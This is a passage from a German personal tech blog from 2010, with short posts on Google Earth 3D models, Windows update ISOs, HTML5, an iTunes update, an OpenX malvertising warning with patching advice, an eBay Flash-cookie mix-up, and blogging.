    Doch es gibt auch noch eine andere Form der Persönlichkeitsgefährdung nämlich die in Google Earth verwendeten 3D Modelle und für alle die sich unser wunderschönes Badnerland in Google Earth mit den 3D Modellen verschönern wollen haben wir diese Sammlung erstellt:

    3D Modelle aus dem Badischen Land: Karlsruhe, Freiburg, Offenburg, Mannheim, Basel, Lörrach, Schwarzwald

    Baden von franky4you - Google 3D-Galerie

    Nichts ist vollkommen und so gibt es auch etliche 3D Modelle die noch in Arbeit sind, deshalb mußten wir die Sammlung auch erweitern.

    Microsoft Download Center: Suchergebnisse

    Für SysAdmins die Offline verschiedene Windowssysteme mit den nötigen Updates versorgen müssen, gibt es im Microsoft Support Download Center einen kleinen Trick. Über die Suche nach ISO-Abbild lassen sich die monatlich zusammengefassten Downloads als ISO Dateien herunterladen.

    Vorteil:
    Damit haben Sie alle Möglichkeiten der Windows Produktgruppen abgedeckt.

    Nachteil:
    Die ISO Dateien variieren und können abhängig von der Datenmenge bis zu 2 DVDs benötigen.

    Microsoft Download Center: Suchergebnisse ISO-Abbild

    Donnerstag, 5. August 2010

    Festnetz und Telefon Nachrichten auf Billiger-Telefonieren.de

    Eigentlich nur ein kommerzielles Webangebot, was aber mit vielen und außergewöhnlich gut recherchierten Beiträgen zu Abzockern und anderen unseriösen Angeboten richtig angenehm glänzt.

    »»» Festnetz und Telefon Nachrichten auf Billiger-Telefonieren.de

    Montag, 26. Juli 2010

    Schluß mit der ollen Technik

    Es klingt hart, aber Webseiten und Webapplikationen werden heutzutage noch mit Mitteln aus dem letzten Jahrhundert erstellt. Der neue HTML 5  Standard wird nicht nur Semantik und JavaScript-APIs bringen sondern auch  etliche neue Möglichkeiten in Sachen Grafik und Multimedia.

    YouTube bietet seine Videos bisher nur in Flash - Playern an. Mit HTML 5 gibt es aber vollkommen neue Möglichkeiten, die aber bisher nicht von allen Browsern unterstützt werden.
    http://www.youtube.com/html5

    Mit HTML5Rocks hat Google eine Anlaufstelle rund um HTML5 ins Netz gestellt. Dort finden sich Präsentationen und Tutorials rund um HTML5, die zum Teil selbst ausgiebigen Gebrauch von neuen HTML5-Funktionen machen. HTML5 bietet etliche neue  Technologien. Konkrete Beispiele gibt es bei Google mit seiner neuen Website HTML5Rocks. Entwicklern wird gezeigt, was bereits heute mit diversen Browsern zu möglich ist.Eine richtig gut gemachte Übersicht der vielen Features gibt es von Google unter: http://slides.html5rocks.com/

    Viele gute Links für das noch junge HTML 5:
    http://x-html5.de/

    Eine eher langweilige akademische Diskussion bei der aber zur auch noch so richtig gefetzt wird, gibt es bei Wikipedia:
    http://de.wikipedia.org/wiki/HTML5

    Dienstag, 20. Juli 2010

    Wichtiges iTunes Update

    Apple hat in der Nacht ein wichtiges Update für iTunes veröffentlicht und damit die Version 9.2.1 zum Download bereitgestellt. Das Paket kann direkt über die Softwareaktualisierung von Apple installiert werden.
    iTunes 9.2.1 enthält viele wichtige Fehlerbehebungen, einschließlich:
    • Deaktiviert ältere Versionen einiger inkompatibler Plug-Ins von Drittherstellern
    • Behebt geringfügige Probleme beim Drag&Drop von Objekten
    • Behebt ein Leistungsproblem beim ersten Synchronisieren mancher Geräte mit iTunes 9.2
    • Behebt ein Problem bei der Aktualisierung auf iOS 4 für iPhones oder iPod touches mit verschlüsselten Backups
    • Behebt andere Probleme, die die Stabilität und Leistung beeinträchtigt haben.

    Freitag, 16. Juli 2010

    Fun Pics, lustige Videos und Online Games kostenlos auf isnichwahr.de

    Deutschlands größte Fun - Community
    In den Abteilungen | FunPics | lustige Videos | Online Spiele | Flash | Witze & Texte | eBay Auktionen | Webseiten | Diverses | gibt es jede Menge zum Schmunzeln.
    Fun Pics, lustige Videos und Online Games kostenlos auf isnichwahr.de

    Donnerstag, 15. Juli 2010

    AD Nutzer sind zur Zeit der häßliche Mops

    Anscheinend konnten Ad-Server die auf dem Open X Prinzip basieren, als die zur Zeit größten Malware Schleudern ausgemacht werden. Durch eine Schwachstelle im OpenX System können über für die ADs vorgesehenen IFrames auf Webseiten Malware auf den Rechner des Besuchs geschleust werden. Das ist deswegen äußerst ärgerlich, da dadurch viele eigentlich seriöse Webseiten zu echten Virenschleudern werden.

    Bürger-CERT ist ein Projekt des Bundesamtes für Sicherheit in der Informationstechnik (BSI).
    SICHER o INFORMIERT
    Extraausgabe vom 15.07.2010
    Webauftritte verteilen Schadcode an Internetnutzer
    Kompromittierte Werbebanner

    Es sollte deshalb jedes Betriebssystem, Anwendung und Antivirenschutz stets auf dem aktuellen Stand gehalten werden. Insbesondere sollten die verfuegbaren Patches für Java, Adobe-Reader und Windows-Betriebssysteme installiert werden.

    Die Firefox-Erweiterung NoScript [https://addons.mozilla.org/de/firefox/addon/722/] schuetzt in der Default-Einstellung vor eingebetteten IFRAME-HTML-Elementen, allerdings und auch leider nicht nur davor.

    Mittwoch, 14. Juli 2010

    eBay und seine Flash-Cookies

    Flash-Cookies oder Local Shared Objects (LSO) sind Dateien, in die Webseiten, welche Flash-Medien einbinden, benutzerspezifische Daten auf dem Rechner des sie abrufenden Benutzers schreiben und später wieder auslesen können. Verwaltet werden diese Dateien nicht vom Webbrowser  selbst, sondern von seinem jeweiligen Flash-Player-Plugin.
    (mehr bei Wikipedia)

    Eingebaut wurden die überaus hartnäckigen Cookies von eBAY um die Sicherheit zu erhöhen. Schon vor der Einführung gab es jede Menge Unkenrufe aus allen Ecken des Webs, doch was uns gestern passierte, war mal wieder vom Feinsten.

    Meine Frau und ich haben beide einen Account in eBay, die beide noch zusätzlich mit den Sicherheitsschlüssel abgeschottet werden.
    Also Gaby folgt der Bitte von eBay einen Test für ein Buch zu schreiben, sie logt mich aus und logt sich ein, Schlüsselabfrage und das komplette Programm. Und tatsächlich Sie landet in Ihrem Account, noch mal kurz nachgeschaut ob auch die wichtigeren eBay Sachen erledigt sind und ab die Post, tippselt eine halbe Stunde lang Ihren Testbericht, schickt Ihn ab und welch Überraschung Sie findet NIX! Nada! Rien!
    Tja und wer bekam es als Fleißarbeit gutgeschrieben Ihr Mann, der absolut nix getippselt hatte!

    So Viel zur unfehlbaren Computertechnik im Online Auktionsgewerbe!

    Würde mich doch zu sehr interessieren, was noch alles schief geht in Internet Cafes etc.!
    So ein Mischmasch aus verschiedenen Accounthandlungen ist uns nicht zum ersten mal passiert, aber hier ist es nach dem großen zeitlichen Aufwand besonders ärgerlich.

    Dienstag, 13. Juli 2010

    Vorteile eines Blogs - kurz und knapp

    Ehrlich gesagt dauerte es leider doch etliche Zeit bis sich die Vorteile eines Blogs für mich herauskristallisiert hatten. Dabei waren Sie eigentlich immer doch recht offensichtlich?!

    Ein ganz offensichtlicher Grund, der für einen Blog spricht, ist:
    Man/Frau/Maus muß sich nicht viele Gedanken machen über:
    • Das Design, denn die Webbaukästen bieten etliche anspruchsvolle Möglichkeiten.
    • Die Suchmaschinenoptimierung (SEO), daß wird von den Bloganbietern meist selbst übernommen. Hier in meinem Blog bei Blogspot/Blogger ist das sogar der Suchmaschinenkaiser Google selbst.
    • Funktionierende Features. Die mit wenigen Klicks hinzufügbaren Features können zwar sicherlich nicht alle ausgefeilten Wünsche abdecken, doch Sie sind schnell eingefügt, funktionieren rasend schnell und müssen nicht mühselig selbst zusammengepfrimmelt werden.
    Kurz gesagt: Ist so ein Blog optimal dafür geeignet schnell mal zwischendurch etwas im Web auf einer zum eigenen Web gehörenden Webseite zu posten. Dafür haben Sie mehr Möglichkeiten wie in einem RSS Feed und weniger Features wie auf Ihrer Domain. Dementsprechend ist Ihr Blog das verbindende Glied, zwischen diesen zwei Teilen Ihrer Webpräsenz.

    Sonntag, 11. Juli 2010

    Amprice – Startupwiki

    Amprice – Startupwiki: "Am 26. Februar 2010 meldete amprice beim Insolvenzgericht Hannover Insolvenz an. Das Insolvenzverfahren wurde zwischenzeitlich eröffnet."

    Schade denn:
    Seit August 2008 gehört der erste arabische Marktplatz moulaha.com zu amprice. Moulaha betreibt in 22 arabischen Ländern Online-Marktplätze und hat wenige Monate nach dem Start bereits über 60.000 Mitglieder. Die Marktplätze von moulaha werden im Verlaufe des Jahres 2010 auf das neue amprice-System umgestellt.

    (mehr)